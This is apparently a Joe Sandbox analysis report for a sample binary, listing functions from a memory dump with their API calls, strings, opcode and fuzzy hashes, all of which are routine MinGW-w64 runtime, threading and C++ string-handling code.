String ID:
API String ID: 897415695-0
Opcode ID: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction ID: 994e6d4c61a0d471ed25d17d919ed02cc65925c8566577230a1de939b8b70c6d
Opcode Fuzzy Hash: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction Fuzzy Hash: BF51A826A18A42B0EB10BB25D4547BEE2A0BF48B94FD44531DD6E4B3D1CF3DD449E329

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA8BA0 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,00007FF739051400,00000000,00007FF738DA7B97,?,?,?,00007FF738DA7CC5,?,?,?,?,00007FF738DA7E65,?,00007FF739051400), ref: 00007FF738DA8BCC
CreateSemaphoreA.KERNEL32 ref: 00007FF738DA8C0C
CreateSemaphoreA.KERNEL32 ref: 00007FF738DA8C23
InitializeCriticalSection.KERNEL32(?,00007FF739051400,00000000,00007FF738DA7B97,?,?,?,00007FF738DA7CC5,?,?,?,?,00007FF738DA7E65,?,00007FF739051400), ref: 00007FF738DA8C4B
InitializeCriticalSection.KERNEL32(?,00007FF739051400,00000000,00007FF738DA7B97,?,?,?,00007FF738DA7CC5,?,?,?,?,00007FF738DA7E65,?,00007FF739051400), ref: 00007FF738DA8C52
InitializeCriticalSection.KERNEL32(?,00007FF739051400,00000000,00007FF738DA7B97,?,?,?,00007FF738DA7CC5,?,?,?,?,00007FF738DA7E65,?,00007FF739051400), ref: 00007FF738DA8C59

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction ID: 7d18bc59280b0bce09c42fca83bd05d231b3fbabf58c19628dc4783aa9d9aea0
Opcode Fuzzy Hash: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction Fuzzy Hash: 1221FF33B16712A5FB15BB25E818B7AA294EF48380F944031CE0C0B3C0EE3D9889D714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E650 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF738D9E769

Strings

Address %p has no image-section, xrefs: 00007FF738D9E6C0, 00007FF738D9E815
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF738D9E801
VirtualProtect failed with code 0x%x, xrefs: 00007FF738D9E7DE
Mingw-w64 runtime failure:, xrefs: 00007FF738D9E688

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction ID: 1b595515dcf6ebc0d918bb23b79b38c78a0050aa6f2ebfe9cd695fc6f1c1303e
Opcode Fuzzy Hash: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction Fuzzy Hash: 5351DC72A18A43B2EA10AF41E841AA9F761FF89B94FC44435EE0D07394EE7CE449D714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DACD30 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

%*.*s, xrefs: 00007FF738DACE75
%-*.*s, xrefs: 00007FF738DACEC6
%.*s, xrefs: 00007FF738DACEB8

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction ID: ffa1220df6cd2db292794689ff723efb8b97ad4f5bd27e26663685f59ba9651d
Opcode Fuzzy Hash: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction Fuzzy Hash: C9518BB3E2425296E770AF29C140779F7E1EB48BA4FA48131CA094F784DA3EE9049764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DAC900 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110COMMON

Download Yara Rule

Strings

%.*S, xrefs: 00007FF738DACA68
%-*.*S, xrefs: 00007FF738DACA76
%*.*S, xrefs: 00007FF738DACA3D

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %*.*S$%-*.*S$%.*S
API String ID: 0-2115465065
Opcode ID: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction ID: b703d727396cd191da43d040d19e77c812321d75df9a0624ee7c8d9c34046578
Opcode Fuzzy Hash: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction Fuzzy Hash: 1241C973F2865265E750AB2E9400779E291AB48BB4FA4C131DE0D4B7C5DE3EE4449B24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB45C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DB45E9
memcmp.MSVCRT ref: 00007FF738DB4608
memcmp.MSVCRT ref: 00007FF738DB4696
memcmp.MSVCRT ref: 00007FF738DB4718

Part of subcall function 00007FF738DC1250: strlen.MSVCRT ref: 00007FF738DC126E

memcmp.MSVCRT ref: 00007FF738DB47C4

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB4649, 00007FF738DB46D3, 00007FF738DB4755, 00007FF738DB4801, 00007FF738DB481A
basic_string::compare, xrefs: 00007FF738DB4642, 00007FF738DB46CC, 00007FF738DB474E, 00007FF738DB47FA, 00007FF738DB4813

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction ID: df35b8f1147c5cb5b7c18e759b4690ad4ce44b2beda7bb66b24843c8a22c9b10
Opcode Fuzzy Hash: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction Fuzzy Hash: 08510793F2499271EE11EA26DC102F4D3929F09BE4FDC4231DE2C877D1ED2DDA89A214

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB5670 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DB5699
memcmp.MSVCRT ref: 00007FF738DB56BA
memcmp.MSVCRT ref: 00007FF738DB5746
memcmp.MSVCRT ref: 00007FF738DB57C5

Part of subcall function 00007FF738DC1250: strlen.MSVCRT ref: 00007FF738DC126E

memcmp.MSVCRT ref: 00007FF738DB5861

Strings

basic_string::compare, xrefs: 00007FF738DB56F4, 00007FF738DB577C, 00007FF738DB57FB, 00007FF738DB5897, 00007FF738DB58B0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB56FB, 00007FF738DB5783, 00007FF738DB5802, 00007FF738DB589E, 00007FF738DB58B7

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction ID: a0f624ff1dce7b06ce754220ab4aad8c22dc7bc818a76b4bf0f0a74d90bc0e9c
Opcode Fuzzy Hash: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction Fuzzy Hash: 05510653F15596B1FE11AA26EC002E4D3A19F08BE0FDC4231EE2C577D5ED2DD98A9314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBD5D0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 00007FF738DBD66E, 00007FF738DBD702
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBD745, 00007FF738DBD79F, 00007FF738DBD7EF
basic_string::_M_construct null not valid, xrefs: 00007FF738DBD662
basic_string::basic_string, xrefs: 00007FF738DBD73E, 00007FF738DBD798
string::string, xrefs: 00007FF738DBD7E8

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction ID: c71b0c55372a4992f0e1d8125e0b2ecb2dee0bc66b0058b1ddd4e306a635b8ad
Opcode Fuzzy Hash: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction Fuzzy Hash: A5510063E19B5AB4EB01BF21D4401A8E364EB1CF94FD44632DA6D43384EE3DD55AE314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBD020 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 00007FF738DBD0BE, 00007FF738DBD152
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBD195, 00007FF738DBD1EF, 00007FF738DBD23F
basic_string::_M_construct null not valid, xrefs: 00007FF738DBD0B2
basic_string::basic_string, xrefs: 00007FF738DBD18E, 00007FF738DBD1E8
string::string, xrefs: 00007FF738DBD238

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction ID: 35e19fbf97f181b798719ebb2d81ab75b187dda071aa0ee7c6d733ac8f8b73ea
Opcode Fuzzy Hash: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction Fuzzy Hash: 3A51F373A19B56B4EB01BF61D4405A8E364FB1CF94BD44632CA6C43384EE3EE59AE314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA5560 Relevance: 10.6, APIs: 7, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF738DA2D40: TlsGetValue.KERNEL32 ref: 00007FF738DA2DA0

TlsGetValue.KERNEL32 ref: 00007FF738DA55B9
CloseHandle.KERNEL32 ref: 00007FF738DA55E5
_endthreadex.MSVCRT ref: 00007FF738DA5603
longjmp.MSVCRT ref: 00007FF738DA5634
CloseHandle.KERNEL32 ref: 00007FF738DA5645
TlsSetValue.KERNEL32 ref: 00007FF738DA5682
CloseHandle.KERNEL32 ref: 00007FF738DA569A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction ID: a3f29abaa45f1c504d48e4a44fc821bc2b8c476ca7c0006c3789f6e33ff47f79
Opcode Fuzzy Hash: 0214bab7663271ea6fee6ac32ca2fa0cc39244fbefd9c866a5c200fdd5429a6d
Instruction Fuzzy Hash: 37513A22A29B02A1EA54BF55D054779F2B9FF48B44FA94035CE0D0B390DF3EE448E729

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA78B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF738DA79C3
., xrefs: 00007FF738DA79B4
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF738DA79CD
C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF738DA79BC

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
API String ID: 0-3957588491
Opcode ID: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction ID: c1ff684a4c6c3cb896624de9ce1bc8017d1c98c18fa9cc3cac191eb743d2c7d0
Opcode Fuzzy Hash: 84b45b647fba6786e436b223dfef3815ddb9f00301ce0779b142d07c5678c86d
Instruction Fuzzy Hash: 3E315E22A29746A4EB10BF55D0513B8E7A0FB48B44FD44136CA8C4B391DF3DE449E72A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F130 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF738D9F1A0
calloc.MSVCRT ref: 00007FF738D9F1AF
EnterCriticalSection.KERNEL32 ref: 00007FF738D9F1CA
LeaveCriticalSection.KERNEL32 ref: 00007FF738D9F1E9

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF738D9F192
!dso || dso == &__dso_handle, xrefs: 00007FF738D9F199

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$EnterLeave_assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 4191840866-4180103562
Opcode ID: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction ID: 9e529a3b06c4c5cde72589e02f8bc14944f93f0dcd143344b5c61c5b136d524b
Opcode Fuzzy Hash: 89d225980ee264ff5e357f890741bd0a0885e460cb129bedeac4b07323f812ca
Instruction Fuzzy Hash: 162141A3E2D64376FB52BB54F8402B5E7A5AF58780FC80070C50C87291EE3DE989E364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9F30 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF738DA9F60
OpenProcess.KERNEL32 ref: 00007FF738DA9F77
CloseHandle.KERNEL32 ref: 00007FF738DA9F85
_errno.MSVCRT ref: 00007FF738DA9FA1

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 99bff5ea223eaa426eec811e31877ad3ae2d66184df2aefccc3710fd92dcba7e
